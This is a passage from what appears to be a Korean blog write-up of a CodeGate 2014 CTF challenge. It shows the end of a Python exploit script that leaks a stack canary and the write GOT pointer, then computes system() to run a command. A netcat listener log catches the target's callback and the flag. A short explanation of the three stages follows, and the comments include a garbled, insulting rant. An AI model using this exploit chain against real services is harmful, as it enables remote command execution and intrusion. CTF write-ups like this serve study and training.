print s.recv(0x1024)
print s.recv(0x1024)
print s.recv(0x1024)
print s.recv(0x1024)
raw_input("[*] Exploit. . . .")
s.send("4\n")
print s.recv(0x1024)
print stage1_payload(canary)
s.send(stage1_payload(canary))# "\x11\xe8\x10\xc3"
w_got = up(s.recv(4))
print "[!] Leaked write_got : " hex(w_got)
print s.recv(0x1024) # r u sure?
s.send(stage2_payload(canary, w_got))
time.sleep(1)
s.send(cmd)
print s.recv(0x1024)
print s.recv(0x1024)
print s.recv(0x1024)
print s.recv(0x1024)
print s.recv(0x1024)
s.close()
#################################################################
raw_input("[*]All Done.")
"""
C:\Users\Administrator>nc -lvp 31333
listening on [any] 31333 ...
58.229.183.18: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.0.93] from (UNKNOWN) [58.229.183.18] 46737: NO_DATA
CMP67_eax_N1gHt_Jz_B3d_PND_SeelEEP
"""
Exploit은 총 3군데로 나눌수 있는데
첫 번째는 스택 쿠키를 가져오는 부분이고 [fork() 되어있기 때문에 항상 카나리 값은 고정이다.]
두 번째는 write_got 포인터를 Leak 시켜서 가져오고
세 번째는 leak 시킨 포인터를 이용하여 system 함수를 계산해서 Command Execution을 한다.
Key : CMP67_eax_N1gHt_Jz_B3d_PND_SeelEEP
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
CodeGate 2014 PreQual CloneTechnique (2) 2014.02.25 CodeGate 2014 PreQual 120 Write Up (0) 2014.02.25 CodeGate 2014 PreQual Angry Doraemon (3) 2014.02.25 CodaGate 2014 PreQual WebProxy write-up (0) 2014.02.25 2014 CodeGate Junior PreQual - Nuclear [exploit] (12) 2014.02.16 2014 CodeGate Junior PreQual - Closure, RunCommand (5) 2014.02.16 Comment 3
-
시스템 주소를 구하는 방법에 대해서 물어봐도될까요?
저는 b7로시작하던데.. 그 주소로 구한거 같진 않으시더라고요- ㄴ
CVE-2012-4792 Analysis Report(sweetchip)_release.pdf
Z ㅋ 왜 답장이 쳐 없냐 개 ㅓ개ㅑ ㅓㅒ꺄ㅓ 개ㅑㅓ 쌰 ㅓㅣ ㅓ ㅣ ㅏㅓ ㅣㅏ ㅓㅒㅑ ㅓ ㅒㅑ ㅓ김선영 ㅓ보 ㅣ저ㅏㅣ쎠이 너ㅣㅏ 너ㅣ 다ㅜ 디져ㅜㄹ지ㅏㅜ 지ㅏ러지ㅏ렂 ㅣㅏ혀니서이ㅜ이ㅏ너 개 ㅓ샤ㅒㅓ기 ㅓ끼ㅏㅓ ㅣ 버그바운티 어케 하는거냐 개ㅑ ㅓ개ㅑ서ㅒㅑ꺼ㅣㅏ ㅓㅣㅏ ㅓ 답글 쳐 달아라 갯 ㅐㅑ거ㅣㅑㅏ ㅓㅣㅏㅆㅜ디 ㅜ자ㅕㅣ뤼자 ㅣ혀나 ㅣ서ㅏㅣ어 ㅣ저ㅣ ㅓㅓ 스위트칩 뒤져ㅏ 개ㅑㅓㄱ ㅑ ㅓㅣㅏ꺼